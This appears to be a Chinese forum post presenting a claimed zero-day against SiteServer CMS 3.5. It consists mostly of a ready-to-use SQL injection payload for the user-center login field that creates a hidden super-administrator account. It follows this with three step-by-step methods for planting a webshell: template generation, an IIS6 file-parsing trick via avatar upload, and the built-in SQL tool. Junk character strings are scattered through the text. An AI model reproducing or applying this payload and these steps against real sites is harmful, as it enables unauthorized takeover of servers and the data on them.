SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

6 \1 e7 R) n3 b( h7 h# H; \5 {stieserver官网:www.siteserver.cn
/ I$ _( ?- a9 k6 U/ u$ L# F* Z5 z


EXP:

直接访问UserCenter/login.aspx

  y+ q: {! c1 X- Z$ q
) ]6 i4 h  J4 @. H& Z
" t- J: a6 Z7 q用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
! P8 \* H! t! U# X' c


密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



之后再访问后台SiteServer/login.aspx用插入的用户登陆

. h# q9 H4 Q' W- K3 k4 ?

" w+ h* [  Z/ ]( R6 v后台拿webshell的三种方法：
* A* W4 X' G  f  R$ y& ~# [! S
7 H9 \8 d& @2 l/ v. z8 e2 F一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 L) e2 m: T& M7 m8 [2 ?, U
' g& K; z$ \2 U! h* E7 F/ F二、
# Z5 f% W2 Z0 C8 |
成员权限-》添加用户-》用户名为：1.asp
' w8 O+ P5 }9 w0 B
/ U& e* ~/ d* f* z* Ohttp://127.0.0.1/usercenter/

1 _  l% s& s  }用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、

7 p0 H: v, K  }! P* t系统工具-》实用工具-》机器参数查看
% V6 K' v  Q+ S: A, W) {- W( ?5 k可以看到数据库类型、名称，WEB路径
' {5 @+ n# o3 ]9 B
系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

: r" j! X* y2 v! @+ i